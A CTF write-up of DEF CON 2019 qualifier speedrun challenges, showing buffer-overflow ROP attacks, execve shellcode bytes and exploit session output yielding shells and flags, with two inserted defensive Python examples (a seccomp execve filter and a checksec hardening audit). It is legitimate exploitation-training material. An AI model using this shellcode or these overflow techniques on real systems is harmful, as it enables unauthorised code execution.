yyy

I want to get good at CTF

DEF CON CTF Qualifier 2019 speedrun-001~003

speedrun-001

$ ./speedrun-001
Hello brave new challenger
Any last words?
hoge
This will be the last thing that you say: hoge

Alas, you had no luck today.

There is a buffer overflow, so I used ROP to call execve("/bin/sh", NULL, NULL).

gist.github.com

$ python exploit.py
[+] Opening connection to speedrun-001.quals2019.oooverflow.io on port 31337: Done
Hello brave new challenger
Any last words?

[*] Switching to interactive mode
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x06@
$ ls
-
banner_fail
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
service.conf
speedrun-001
srv
sys
tmp
usr
var
wrapper
$ cat /flag
OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3. pwning's pwning.}
[*] Got EOF while reading in interactive

speedrun-002

$ ./speedrun-002
We meet again on these pwning streets.
What say you now?
hoge
What a ho-hum thing to say.
Fare thee well.

This one also has a buffer overflow. I first tried calling system via ret2libc from the ROP chain, but it worked locally and failed remotely. It seems the remote environment was restricted so that the system function could not be used, so, as in 001, I switched to invoking the system call directly and got a shell.
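The writeup only observes that system() appeared to be unusable remotely while a direct execve syscall still worked. Whatever the actual restriction was (the page does not say), the lesson for defenders is that blocking a libc function is not a syscall-layer control. The following is an added example, not code from the writeup or the challenge: it builds a seccomp-BPF filter that returns EPERM for execve and execveat on x86-64 Linux, a small interpreter for the three BPF opcodes used so the filter's decisions can be checked offline, and an install() helper that loads it through prctl(2). The kernel ABI constants are assumed from the Linux uapi headers; nothing here is taken from the CTF binaries.

```python
"""Added example (not the challenge author's code): a seccomp-BPF filter that
refuses execve/execveat at the syscall layer, plus a tiny evaluator so the
filter's decisions can be checked offline. Assumes x86-64 Linux; the constants
below are kernel ABI values from the uapi headers, not anything from the CTF."""
import ctypes
import struct
import sys

# Kernel ABI constants for x86-64 Linux (assumed from linux/seccomp.h,
# linux/audit.h, linux/prctl.h and the x86-64 syscall table).
AUDIT_ARCH_X86_64 = 0xC000003E
NR_EXECVE, NR_EXECVEAT = 59, 322
PR_SET_NO_NEW_PRIVS, PR_SET_SECCOMP, SECCOMP_MODE_FILTER = 38, 22, 2
SECCOMP_RET_KILL_PROCESS = 0x80000000
SECCOMP_RET_ERRNO = 0x00050000
SECCOMP_RET_ALLOW = 0x7FFF0000
EPERM = 1
# The only BPF opcodes this filter needs.
BPF_LD_W_ABS = 0x20   # A = 32-bit word at offset k of struct seccomp_data
BPF_JEQ_K = 0x15      # if A == k: pc += 1 + jt else: pc += 1 + jf
BPF_RET_K = 0x06      # return k
# Offsets inside struct seccomp_data: nr at 0, arch at 4.
OFF_NR, OFF_ARCH = 0, 4


def build_deny_execve_filter():
    """Return the filter as a list of (code, jt, jf, k) instructions."""
    return [
        (BPF_LD_W_ABS, 0, 0, OFF_ARCH),
        (BPF_JEQ_K, 1, 0, AUDIT_ARCH_X86_64),    # wrong arch -> kill
        (BPF_RET_K, 0, 0, SECCOMP_RET_KILL_PROCESS),
        (BPF_LD_W_ABS, 0, 0, OFF_NR),
        (BPF_JEQ_K, 2, 0, NR_EXECVE),            # execve   -> EPERM
        (BPF_JEQ_K, 1, 0, NR_EXECVEAT),          # execveat -> EPERM
        (BPF_RET_K, 0, 0, SECCOMP_RET_ALLOW),    # everything else
        (BPF_RET_K, 0, 0, SECCOMP_RET_ERRNO | EPERM),
    ]


def evaluate(prog, nr, arch):
    """Interpret the filter for one syscall (nr, arch) and return its verdict."""
    data = {OFF_NR: nr, OFF_ARCH: arch}
    acc, pc = 0, 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        if code == BPF_LD_W_ABS:
            acc = data[k]
            pc += 1
        elif code == BPF_JEQ_K:
            pc += 1 + (jt if acc == k else jf)
        elif code == BPF_RET_K:
            return k
        else:
            raise ValueError("unsupported opcode %#x" % code)
    raise ValueError("filter fell off the end")


def install(prog):
    """Load the filter into the calling process via prctl(2).
    Returns True on success; Linux-only, and irreversible for the process."""
    if not sys.platform.startswith("linux"):
        return False
    libc = ctypes.CDLL(None, use_errno=True)
    # struct sock_filter is {u16 code; u8 jt; u8 jf; u32 k;} = 8 bytes.
    insns = b"".join(struct.pack("HBBI", *insn) for insn in prog)
    buf = ctypes.create_string_buffer(insns, len(insns))

    class SockFprog(ctypes.Structure):
        _fields_ = [("len", ctypes.c_ushort), ("filter", ctypes.c_void_p)]

    fprog = SockFprog(len(prog), ctypes.cast(buf, ctypes.c_void_p))
    if libc.prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0:
        return False
    return libc.prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER,
                      ctypes.byref(fprog), 0, 0) == 0


if __name__ == "__main__":
    prog = build_deny_execve_filter()
    print("execve verdict: %#x" % evaluate(prog, NR_EXECVE, AUDIT_ARCH_X86_64))
    if install(prog):
        import subprocess
        try:
            subprocess.run(["/bin/true"])
        except PermissionError as exc:
            print("execve refused after install:", exc)
```

The filter checks the architecture first so that a 32-bit syscall entry cannot slip past the x86-64 syscall numbers, and it decides on the syscall number alone, which is why a ROP chain that invokes execve directly is caught just as a call through system() would be.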

gist.github.com

$ python exploit.py
[+] Opening connection to speedrun-002.quals2019.oooverflow.io on port 31337: Done
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/speedrun-002'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/libc/lib/x86_64-linux-gnu/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
We meet again on these pwning streets.
What say you now?

What an interesting thing to say.
Tell me more.

Fascinating.

leak_addr: 0x7f4b03669140
libc_base: 0x7f4b03559000
system_addr: 0x7f4b035a8440

We meet again on these pwning streets.
What say you now?

What an interesting thing to say.
Tell me more.

Fascinating.

[*] Switching to interactive mode
$ cat /flag
OOO{I_didn't know p1zzA places__mAde pwners.}
$ exit
[*] Got EOF while reading in interactive
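The checksec lines that pwntools printed above are exactly the properties that decided how the first two challenges were solved: no canary, no PIE and partial RELRO. As an added example (not part of the writeup), here is a small parser for that checksec block that reports each missing mitigation together with the GCC/ld option that would enable it. The sample text is copied from the output above; the mapping from finding to toolchain flag is standard and not something the page states.

```python
"""Added example (not from the writeup): parse pwntools-style checksec output
and list which hardening features are absent, with the toolchain flags that
would enable them. SAMPLE is copied from the writeup's speedrun-002 output."""
import re

SAMPLE = """\
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/speedrun-002'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/libc/lib/x86_64-linux-gnu/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
"""

# (field, predicate that is true when the value is the weak setting, advice)
CHECKS = [
    ("RELRO", lambda v: not v.startswith("Full"),
     "link with -Wl,-z,relro,-z,now (full RELRO, read-only GOT)"),
    ("Stack", lambda v: v.startswith("No canary"),
     "compile with -fstack-protector-strong"),
    ("NX", lambda v: v.startswith("NX disabled"),
     "do not link with -z execstack"),
    ("PIE", lambda v: v.startswith("No PIE"),
     "build with -fPIE -pie so ASLR also randomises the binary"),
]

HEADER = re.compile(r"^\[\*\] '(?P<path>[^']+)'$")
FIELD = re.compile(r"^\s+(?P<key>\w+):\s+(?P<value>.+?)\s*$")


def parse_checksec(text):
    """Return {path: {field: value}} for each binary block in the text."""
    result = {}
    current = None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = result.setdefault(m.group("path"), {})
            continue
        m = FIELD.match(line)
        if m and current is not None:
            current[m.group("key")] = m.group("value")
    return result


def weaknesses(fields):
    """Return [(field, value, advice)] for every mitigation that is missing."""
    out = []
    for key, is_weak, advice in CHECKS:
        value = fields.get(key)
        if value is not None and is_weak(value):
            out.append((key, value, advice))
    return out


def audit(text):
    """Map each binary path in a checksec dump to its list of weaknesses."""
    return {path: weaknesses(f) for path, f in parse_checksec(text).items()}


if __name__ == "__main__":
    for path, findings in audit(SAMPLE).items():
        print(path)
        for key, value, advice in findings:
            print("  %-6s %-20s -> %s" % (key, value, advice))
```

Run against the sample, the challenge binary is flagged for RELRO, Stack and PIE while the libc is flagged only for partial RELRO, which matches the writeup: a fixed-address binary with no canary is what made the ROP chain straightforward, and NX alone did not help.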

speedrun-003

$ ./speedrun-003
Think you can drift?
Send me your drift
hoge
You're not ready.

A shellcode challenge. You have to send 30 bytes of shellcode, and the XOR of all the bytes in the first half must equal the XOR of all the bytes in the second half.

48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f6e69622f
73 68 00
31 f6                   xor    esi,esi
56                      push   rsi
53                      push   rbx
54                      push   rsp
5f                      pop    rdi
b0 3b                   mov    al,0x3b
31 d2                   xor    edx,edx
0f 05                   syscall

I used shellcode like the above, but since it is 22 bytes I adjusted it to fit. Specifically, I made the first half end at push rsp, and padded the rest by increasing xor edx, edx to four copies; to make the XOR values match I also doubled mov al, 0x3b and varied the 0x3b in the earlier of the two, which finally ended up as mov al, 0x5a.

gist.github.com

$ python exploit.py
[+] Opening connection to speedrun-003.quals2019.oooverflow.io on port 31337: Done
[*] Switching to interactive mode
Think you can drift?
Send me your drift
$ cat /flag
OOO{Fifty percent of something is better than a hundred percent of nothing. (except when it comes to pwning)}
$ exit
[*] Got EOF while reading in interactive